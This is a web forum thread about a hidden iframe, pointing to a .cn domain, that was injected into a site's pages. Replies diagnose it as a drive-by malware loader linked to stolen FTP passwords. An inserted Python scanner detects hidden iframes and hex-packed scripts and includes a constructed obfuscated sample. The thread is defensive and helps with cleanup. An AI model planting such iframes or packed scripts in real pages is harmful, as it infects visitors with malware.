Hello, I recently found this code in my site page (it's an ASP page and it's dynamic content): <iframe src="http://betworldwager.cn/in.cgi?income69" width=1 height=1 style="visibility: hidden"></iframe> No idea how it got there and what it is. Anyone have an idea?
This iframe URL is: If you are on shared hosting, check your file and folder permissions (644 is good). Regards.
Yes, this is an HTML framer. Basically, anyone who visited your website would have this hidden iframe open, which would then download a malware trojan to their PC. Either your server has been hacked or someone has gained access through a script vulnerability. Not very nice at all - can I ask who your web host is, as a couple of my clients' sites hosted with 1and1.co.uk had the same problem this week?
They also inserted this at the footer:
Looks like trojan code. You should check with your hosting company; maybe their whole server is hacked and many other sites have trojans. If they got hacked, it is better to move to a safer company that has virus-checking software and checks for trojans periodically.
What I have noticed - it's on most of my sites now - is that they have either hacked into my computer or found some other way of reading from my FileZilla saved passwords - it's all from FileZilla accounts. They use a tracking system and then a find and replace after the <body> tag to insert the iframe, and then another find and replace before the </body> tag, and I think they look for index.php and files like index2.php etc. It's affected all my sites and Google says my sites are now spam - crazy. The other thing is I am using McAfee - the very latest version - and AVG on my computer, and it looks like it got past them. I do think it could have been a dictionary jump on one of my site logins, but usually after so many attempts of logging in it blogs this, so no idea. Will only really find out more information when more people talk about this. Happened to many clients and on different hosts and different sites.
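The two artefacts described in this thread (a hidden iframe and a footer script whose string literals are hex that unpacks through a write call) can be searched for in a downloaded copy of a site. This Python scanner is an added example, not code from any poster; the function names, the heuristics and the constructed example.invalid sample are assumptions for illustration, and the script is decoded statically and never executed.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Heuristic: an iframe that is 0/1 px wide or high, or styled invisible.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?(?:(?:width|height)\s*=\s*[\"']?[01]\b"
    r"|visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>", re.I)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
LITERAL = re.compile(r"'([^']*)'")
HEX_ONLY = re.compile(r"[0-9A-Fa-f]+")

def decode_layers(js: str) -> str:
    """Statically undo hex then %-encoding; the script is never executed."""
    # '3C7'+v+'3637' with v='' is just 3C73637: join the all-hex literals.
    joined = "".join(s for s in LITERAL.findall(js) if HEX_ONLY.fullmatch(s))
    if len(joined) < 40:
        return ""
    joined = joined[: len(joined) // 2 * 2]  # drop a dangling half byte
    return unquote(bytes.fromhex(joined).decode("latin-1"))

def scan_text(html: str) -> list[str]:
    """Findings for one page: plain hidden iframes and hex-packed scripts."""
    found = ["hidden iframe: " + m.group(0) for m in HIDDEN_IFRAME.finditer(html)]
    for body in SCRIPT.findall(html):
        decoded = decode_layers(body) if "write" in body else ""
        if decoded:
            tag = HIDDEN_IFRAME.search(decoded)
            found.append("packed script -> " + (tag.group(0) if tag else decoded[:120]))
    return found

def scan_tree(root: str, exts=(".php", ".asp", ".html", ".htm")) -> dict:
    """Scan every page under a local copy of the web root."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            findings = scan_text(path.read_text(errors="replace"))
            if findings:
                hits[str(path)] = findings
    return hits

def constructed_sample() -> str:
    """Constructed page using the same layering, pointing at example.invalid."""
    tag = "<iframe src='http://example.invalid/x' width=1 height=1></iframe>"
    pct = "".join(f"%{b:02x}" for b in tag.encode())
    hexed = f"document.write(unescape('{pct}'))".encode().hex()
    parts = "'+v+'".join(hexed[i:i + 7] for i in range(0, len(hexed), 7))
    return f"<body><script>var v='';document.write(d('{parts}'));</script></body>"

if __name__ == "__main__":
    print(scan_text(constructed_sample()))
```

Run scan_tree against an offline copy of the web root; any hit is a file to restore from a clean backup after the FTP passwords have been changed.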
It's possible that they got into your site first and then loaded a remote code execution tool on it which infected your computer itself. I would change all of my passwords, get a new host, and reformat.
For anyone who is interested or comes to this later on: they are iframe and JavaScript exploits. Take a good read and look at these posts, with threads of loads of discussion about this, including a 10-month research finding on it:
http://forums.cpanel.net/showpost.php?p=363225&postcount=26 - Great post about it and how it happens, how to avoid it, and how to prevent it in future
http://forums.cpanel.net/showthread.php?t=61066&page=2
http://forums.cpanel.net/showthread.php?t=62821&page=4
http://www.google.co.uk/search?q=ft...s=org.mozilla:en-GB:official&client=firefox-a